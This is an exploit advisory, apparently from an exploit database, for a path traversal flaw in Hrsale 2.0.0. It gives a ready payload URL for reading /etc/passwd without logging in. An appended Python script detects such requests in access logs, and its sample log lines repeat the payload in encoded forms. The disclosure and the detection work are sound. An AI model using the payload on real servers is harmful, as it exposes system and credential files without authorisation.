## https://sploitus.com/exploit?id=PACKETSTORM:159654
# Exploit Title: Hrsale 2.0.0 - Local File Inclusion  
# Date: 10/21/2020  
# Exploit Author: Sosecure  
# Vendor Homepage: https://hrsale.com/index.php  
# Version: version 2.0.0  
  
Description:  
This exploit allows you to download any readable file from the server without permission or a login session.  
  
Payload:  
https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd  
POC:  
  
1. Access the HRsale application and browse to the download path with the payload  
2. Get /etc/passwd
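
Detection: the request above leaves a recognisable trace in the web server access log. The following is an added example, not part of the original advisory or of Hrsale's code; it flags requests to the /download endpoint whose filename parameter contains traversal segments, including percent-encoded and double-encoded forms. The log lines, IP addresses, status codes and function names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Oct/2020:10:00:01 +0000] "GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.5 - - [21/Oct/2020:10:00:04 +0000] "GET /download?type=files&filename=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843',
    '203.0.113.5 - - [21/Oct/2020:10:00:09 +0000] "GET /download?type=files&filename=%252e%252e%252fconfig.php HTTP/1.1" 404 0',
    '198.51.100.7 - - [21/Oct/2020:10:01:00 +0000] "GET /download?type=files&filename=payslip_2020_09.pdf HTTP/1.1" 200 52110',
    '198.51.100.7 - - [21/Oct/2020:10:01:30 +0000] "GET /dashboard?ref=../home HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded sequences are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(filename):
    """True if the decoded name would escape the download directory."""
    name = fully_decode(filename).replace("\\", "/")
    return name.startswith("/") or ".." in name.split("/") or "\x00" in name

def find_traversal_requests(lines, path="/download", param="filename"):
    """Return (client_ip, status, decoded_filename) for suspicious download requests."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if url.path.rstrip("/") != path:
            continue
        # parse_qs decodes once; fully_decode handles any remaining layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if is_traversal(raw):
                hits.append((ip, int(status), fully_decode(raw)))
    return hits

if __name__ == "__main__":
    for ip, status, name in find_traversal_requests(SAMPLE_LOG):
        print(f"{ip} status={status} filename={name}")
```

Hits with status 200 are the ones to triage first, since they indicate the file was actually served.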